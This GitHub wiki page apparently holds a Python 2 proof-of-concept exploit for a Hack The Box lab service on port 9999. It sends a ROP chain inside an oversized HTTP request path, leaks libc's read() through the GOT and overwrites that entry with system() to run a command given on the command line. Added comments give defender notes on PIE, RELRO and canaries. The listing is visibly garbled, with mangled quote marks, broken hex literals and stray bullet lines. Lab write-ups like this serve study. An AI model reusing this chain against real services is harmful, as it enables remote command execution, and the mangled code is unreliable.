smash v3 - adydawkins/htb-rabbit GitHub Wiki
#!/usr/bin/python
# Proof-of-concept from the htb-rabbit wiki ("smash v3"): a stack-overflow
# ROP chain delivered as an oversized HTTP request line to a service on
# 127.0.0.1:9999, followed by a libc leak and a GOT overwrite.
# Python 2 syntax (print statements). As pasted here the wiki rendering has
# mangled quote characters and hex literals, so this listing is a record of
# the technique rather than a runnable script.
#
# Defender's notes (general to this class of chain, not specific findings):
#  - The chain depends on fixed, non-PIE PLT/gadget addresses (0x400c50,
#    0x400cf0, 0x401787) and a writable GOT entry (0x603088). PIE removes the
#    fixed addresses, Full RELRO makes the GOT read-only, and a stack canary
#    would detect the overwrite before the saved return address is used.
#  - On the wire this is a GET whose path is over 500 bytes of filler followed
#    by raw binary, then a second send of a command string. A request-line
#    length/charset check at the listener (or a reverse proxy/WAF in front of
#    it) rejects it, and the pattern stands out in access logs.
import os, sys, socket
import struct
import requests  # imported but never used below
# target address tuple for socket.connect()
addr = (β127.0.0.1β, 9999)
# command string, taken from the command line and NUL-terminated
cmd = sys.argv1+"\0"
#cmd = βlsβ
# libc offsets of read() and system() as given on the page; used at the end
# to derive system() from the leaked read() address
libcread_offset = 0Γ0e8050
libcsystem_offset = 0Γ042510
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# request line prefix; the filler and chain below are appended to the path
payload = rβGET /\AAAAβ
#filler β fill buffer with Aβs , thought this would be 536 β 4, but turns out to be 535
payload += βAβ * (535 β 4)
#overwrite RBX β offset 536
payload += βBβ * 8
#overwrite RBP β offset 544
payload += βCβ * 8
#fill before start of RSP β offset 568
payload += βDβ * 16
# someother: the ROP chain, assembled as little-endian 64-bit words
#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdin
someother += struct.pack(β<Qβ, 0Γ000602e28) #.dynamic addr
someother += struct.pack(β<Qβ, len(cmd)) #len of cmd
#leak address of read() in randomised libc
someother += struct.pack(β<Qβ, 0Γ400c50) #write() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdout
someother += struct.pack(β<Qβ, 0Γ000603088) #read() in GOT
someother += struct.pack(β<Qβ, 8) #len
#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdin
someother += struct.pack(β<Qβ, 0Γ000603088) #read() in GOT
someother += struct.pack(β<Qβ, 8) #len
#call read@plt with address of system() in libc
someother += struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += βFFFFFFFFβ # bogus
someother += struct.pack(β<Qβ, 0Γ000602e28) #.dynamic addr system()
- libc read offset = 0Γ0e8050
- libc system offset = 0Γ042510
#padding β continue filler, writing into RSP
#payload += βEβ * 150
payload = payload + someother
s.connect(addr)
#print(payload+β β+rβHTTP/1.1β+β\nβ+βHost: localhost:9999β+β\nβ+βUser-Agent: curl/7.60.0β+β\nβ+βAccept: /β+β\nβ)
# first send: the request line (path carries the chain) plus curl-like headers
s.send(payload+β β+rβHTTP/1.1β+β\nβ+βHost: localhost:9999β+β\nβ+βUser-Agent: curl/7.60.0β+β\nβ+βAccept: /β+β\nβ+β\nβ+β\nβ)
# second send: the command string consumed by the first read() in the chain
s.send(cmd)
- calculate system() addr and send back
# the 8 bytes written back by the chain are the leaked read() pointer
readaddr = struct.unpack(β<Qβ, s.recv(1024))0
print βlibc read() found at 0x%.8xβ % readaddr
systemaddr = readaddr β libcread_offset + libcsytem_offset
print βlibc system() found at 0x%.8xβ % systemaddr
s.send(struct.pack(β<Qβ, systemaddr))
print s.recv(1024)
# attribute lookup only, not a call: the socket is never explicitly closed
s.close